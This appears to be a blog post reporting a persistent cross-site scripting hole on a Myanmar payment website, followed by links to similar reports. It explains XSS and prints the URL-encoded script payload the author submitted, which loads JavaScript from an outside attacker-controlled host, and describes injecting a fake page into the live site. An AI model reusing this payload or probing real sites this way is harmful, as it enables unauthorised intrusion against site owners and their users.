IPAY : Online Myanmar

This evening, I found a fascinated  big bill board “IPAY” http://www.ipay.com.mm at Thamine Junction, Yangon, Myanmar. Then, I said my friend “googl3group” about it, and said  “NO XSS, NO SQL Injection, NO RFI, NO LFI”! …
Yeah, NO DATABASE too! he said… LOL…

After a few minutes, “googl3group” send me a link to check XSS vulnerabilities may be existing there at www.ipay.com.mm/myan/insert.php. Yeah, XSS, persistent xss.

 Cross Site Scripting is a client-side attack where an attacker can craft a malicious link, containing script- code which is then executed within the victim’s browser when the target site vulnerable to and injected with XSS is viewed. The script-code can be any language supported by the browser but mostly HTML and Javascript is used along with embedded Flash, Java or ActiveX.

In some cases where the XSS vulnerability is persistent as described further below, the attacker will not have to craft a link as the injected script is inserted directly into the target site and / or web application. The target user(s) still has to view the affected site / page where the injected code is located though.

The persistent XSS can be triggered just by browsing a Web Application with code injected into it. (This depends on which page has code injected, in case the target is not globally affected on all pages loaded by the user.)

The place where user have to question and answer,

IPAY : The Place , where you have to send message.

I just summited XSS Script

%22%3E%3Cscript%20src=http://www.planetcreator
.net/attacking/xss/planetcreator-xss.js%3E%3C/script%3E%3E

IPAY : XSS Vulnerabilities

This is PlanetCreator’s XSS Fake Page.

IPAY : Fake PAGE with XSS

informed to :- webmaster

This is vulnerability is posted at Vulnerabilities Research Page http://www.planetcreator.net/info

We hope that your security staff will look into this issue and fix it as soon as possible.

Explore More

Critical XSS Vulnerability in Shwe Myanmar http://www.shwemyanmar.net

PlanetCreator has reported another Critical XSS Vulnerability in Shwe Myanmar http://www.shwemyanmar.net Cross-site scripting (XSS) is a type of computer security vulnerability typically found in web applications that enables malicious attackers

Read More

Security Weakness of Emerge (Malaysia Web Hosting)

No man is infallible, Nobody safes @ online and There’s no complete secure protection in this Cyberwar! During these days I’m really busy with my own business! In my dream

Read More

Koobface; The Facebook virus. Latest in the list of social networking virus

Virus developers are still targeting social networking users to distribute the virus. The “friendly nature” of the social networking sites makes it easier to spread the worm quickly. Most users

Read More